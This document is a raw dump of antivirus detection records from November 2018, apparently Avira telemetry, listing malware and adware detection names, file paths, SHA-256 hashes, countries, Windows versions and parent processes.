  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T13:09:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141101-019b69aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13cc31a3\\AVSCAN-20181101-140956-FB5DC91F\\AVSCAN-20181101-141101-019B69AA', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:11:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-01T22:19:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151539-65d0829c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b55ac59c\\AVSCAN-20181101-151510-62C05EB2\\AVSCAN-20181101-151539-65D0829C', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110249-37195c35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68ba5657\\AVSCAN-20181101-110204-2F20D71F\\AVSCAN-20181101-110249-37195C35', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:02:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110242-35c2f88d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68ba5657\\AVSCAN-20181101-110204-2F20D71F\\AVSCAN-20181101-110242-35C2F88D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:02:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T08:31:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (8).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (8).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T03:01:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-063732-feeab14b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_88b84a21\\AVSCAN-20181101-055743-1315B9BD\\AVSCAN-20181101-063732-FEEAB14B', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T18:59:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200305-48bc81ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_20487899\\AVSCAN-20181101-200147-3EDC30CF\\AVSCAN-20181101-200305-48BC81AD', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182716-4379d96d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_87aa883d\\AVSCAN-20181101-182407-2060EB23\\AVSCAN-20181101-182716-4379D96D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keac.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Koyc\\keac.exe', filesize=320000, name='HEUR/AGEN.1002500.#M1.#R1'), hash='5f37114740b39c7aeb1555352790fb9bbedfe4fb7a9127edebd1600ac7703f0d', metadata=Row(cmdline='\\\\\\/scan \\\\\\/cleanclose', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Spybot - Search & Destroy 2\\SDScan.exe', parentsize=7651984, timestamp='2018-11-01T14:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152912-4160e362', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_782bea3d\\AVSCAN-20181101-152455-2082CB32\\AVSCAN-20181101-152912-4160E362', filesize=320000, name='HEUR/AGEN.1002500.#M1.#R1'), hash='5f37114740b39c7aeb1555352790fb9bbedfe4fb7a9127edebd1600ac7703f0d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:29:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='memurepair.exe', filepath='D:\\Program Files\\Microvirt\\MEmu\\MEmuRepair.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='5fe26051a2da329acdfbc8620014ebe8fbdcd7f91a831708732f648323684761', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Alwil Software\\Avast5\\AvastSvc.exe', parentsize=40384, timestamp='2018-11-01T07:18:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-063159-b814d827', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_70573062\\AVSCAN-20181101-063128-B431378D\\AVSCAN-20181101-063159-B814D827', filesize=64000, name='PUA/Vittalia.#M1.#R1'), hash='5fe522ad087cda06a9caafd79516ca2837642e8bea15fe103f58aada98aae3b1', metadata=Row(cmdline=None, country='HT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upr.exe', filepath='C:\\Windows\\upr.exe', filesize=64000, name='HEUR/AGEN.1008100.#M1.#R1'), hash='5fe522ad087cda06a9caafd79516ca2837642e8bea15fe103f58aada98aae3b1', metadata=Row(cmdline=None, country='HT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:30:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5ffadf2a47843f8f3bf6e27f82e20df0a6d35e7e49548ef2b2afa6e0f3703ad7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\5FFADF2A47843F8F3BF6E27F82E20DF0A6D35E7E49548EF2B2AFA6E0F3703AD7', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='5ffadf2a47843f8f3bf6e27f82e20df0a6d35e7e49548ef2b2afa6e0f3703ad7', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T11:59:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0001649.exe', filepath='E:\\System Volume Information\\_restore{69212C0F-784E-4A08-A5CD-0319A60006C2}\\RP2\\A0001649.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='601eaac9cfac3a258d87d26d9f46f53a25045419a9dbe7c725f904e73c9bbc58', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:26:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rumomeca.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9322724\\rumomeca.exe', filesize=576000, name='HEUR/AGEN.1000047.#M1.#R1'), hash='607c3b31d74eae6fbd9b348ddac1ec1bb9d1897eb4dffcd415c998dbaf1ff059', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T05:11:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-132646-d0be74fa', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5b58d36e\\AVSCAN-20181102-131433-69A02F5C\\AVSCAN-20181102-132646-D0BE74FA', filesize=80000, name='TR/Ghokswa.bbago.#M1.#R1'), hash='608157045d1092d1192901f7476b7aaabdd1237ef69ac4539c0ed85b7a374921', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:31:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='us.exe', filepath='E:\\driver\\dellinspiron1440driversoundxp\\Audio\\HDAQFE\\win2k_xp\\us\\us.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='617bd2bc0d2f4bc03ec5448fcfcd5a6dbfe3eb08914ed750726e0db3d00b294f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='61a433746d3cf7ffafc4a1e06d48c2b686823e142145d7b01a7163123d9e8bd5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:51:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='61a433746d3cf7ffafc4a1e06d48c2b686823e142145d7b01a7163123d9e8bd5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:51:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clickjogos - superfighters.exe', filepath='C:\\Users\\X\\Downloads\\ClickJogos - Superfighters.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='61ea9bec5db1e7e23c40c951a31a9a077dcc6fc1e4c39992f6effe6c4d6f8d71', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-01T00:13:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='atube_catcher_0419923594.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\aTube_Catcher_0419923594.exe', filesize=2460000, name='PUA/InstallCore.#M1.#R1'), hash='62baa352039830f5fd30eb37497b849a646d678db29466333ac2a0c43fdda658', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='atube_catcher_3419256383.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\aTube_Catcher_3419256383.exe', filesize=2460000, name='PUA/InstallCore.#M1.#R1'), hash='62baa352039830f5fd30eb37497b849a646d678db29466333ac2a0c43fdda658', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205244-265b3ea6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7e9c7340\\AVSCAN-20181101-205233-2410F55F\\AVSCAN-20181101-205244-265B3EA6', filesize=2460000, name='PUA/InstallCore.#M1.#R1'), hash='62baa352039830f5fd30eb37497b849a646d678db29466333ac2a0c43fdda658', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:52:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='atube_catcher_0242910685.exe', filepath='c:\\users\\X\\downloads\\atube_catcher_0242910685.exe', filesize=2460000, name='PUA/InstallCore.#M1.#R1'), hash='62baa352039830f5fd30eb37497b849a646d678db29466333ac2a0c43fdda658', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:52:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='giant savingsgui.exe', filepath='C:\\Program Files (x86)\\Giant Savings\\Giant SavingsGui.exe', filesize=2096000, name='Adware/CrossRider.whjz.#M1.#R1'), hash='62c965e6c6d4f2658f1c9fbc3d020ab0db5105401c871e8cb8565bdfbf463750', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTel\\wicainventory.exe', parentsize=None, timestamp='2018-11-01T09:00:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:09:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:28:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:28:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bdcamsetup.exe', filepath='C:\\Users\\X\\Documents\\Programs\\bdcamsetup.exe', filesize=17600000, name='W32/Virut.Gen.#M1.#R1'), hash='62e2ae62607f6c47921f45dccda776f9bce39b44644294f687eb79358063deec', metadata=Row(cmdline='\\\\\\/onboot', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Internet Download Manager\\IDMan.exe', parentsize=4100152, timestamp='2018-11-01T11:44:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bdcamsetup.exe', filepath='C:\\Users\\X\\Documents\\Programs\\bdcamsetup.exe', filesize=17600000, name='W32/Virut.Gen.#M1.#R1'), hash='62e2ae62607f6c47921f45dccda776f9bce39b44644294f687eb79358063deec', metadata=Row(cmdline='\\\\\\/onboot', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Internet Download Manager\\IDMan.exe', parentsize=4100152, timestamp='2018-11-01T06:47:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baixaki_windows-movie-maker.exe', filepath='E:\\Backup Simone\\Downloads\\Baixaki_windows-movie-maker.exe', filesize=1864000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='6339755c14995cab4a6a6316411952208ced2f960b5a935906237c1e0719bd60', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2870272, timestamp='2018-11-01T16:35:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='635423437276d091c941fff2f7538391b1c635546690eb32e0cea700df4b2c43', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-32\\635423437276D091C941FFF2F7538391B1C635546690EB32E0CEA700DF4B2C43', filesize=512000, name='TR/Dropper.Gen.#M300.#R4380'), hash='635423437276d091c941fff2f7538391b1c635546690eb32e0cea700df4b2c43', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-8.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-9.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-31.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T10:49:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='635774fceb7859d5814a2d8d7cdfd05aa9e22878bd399d98d60748e5f4f6a2d0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\635774FCEB7859D5814A2D8D7CDFD05AA9E22878BD399D98D60748E5F4F6A2D0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='635774fceb7859d5814a2d8d7cdfd05aa9e22878bd399d98d60748e5f4f6a2d0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:27:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='63d2b0d508caffd89e6f8fbdb6ff1ba0d3195edf16e3109531b2fa3a9da732f6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\63D2B0D508CAFFD89E6F8FBDB6FF1BA0D3195EDF16E3109531B2FA3A9DA732F6', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='63d2b0d508caffd89e6f8fbdb6ff1ba0d3195edf16e3109531b2fa3a9da732f6', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:29:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='63f991f524fd3469d5a133bb028a629a67d3f9ae56e1005cdd501d2e56a46040', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\63F991F524FD3469D5A133BB028A629A67D3F9AE56E1005CDD501D2E56A46040', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='63f991f524fd3469d5a133bb028a629a67d3f9ae56e1005cdd501d2e56a46040', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:16:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách tập huấn xlhc.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\danh sách tập huấn xlhc.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='640434aa3e4841d8960d6351053691f5247bbf502519670db068d8e6bc32edfe', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161503-e9a7b544', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161503-E9A7B544', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='640434aa3e4841d8960d6351053691f5247bbf502519670db068d8e6bc32edfe', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:15:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename="setup_21 (deleted b'32c3021c45729d2989d4d4bedd537cca').htm", filepath="C:\\Users\\X\\Dropbox (TANTO CITRA MANDIRI)\\.dropbox.cache\\2018-11-01\\setup_21 (deleted b'32c3021c45729d2989d4d4bedd537cca').htm", filesize=12000, name='W32/Chir.B.#M1.#R1'), hash='64141040eca15e2ac3a9d1f003e1bbc6c905b43651eecb32905328be669e9937', metadata=Row(cmdline='\\\\\\/systemstartup', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-01T10:22:46Z'), dt=datetime.date(2018, 11, 1)),
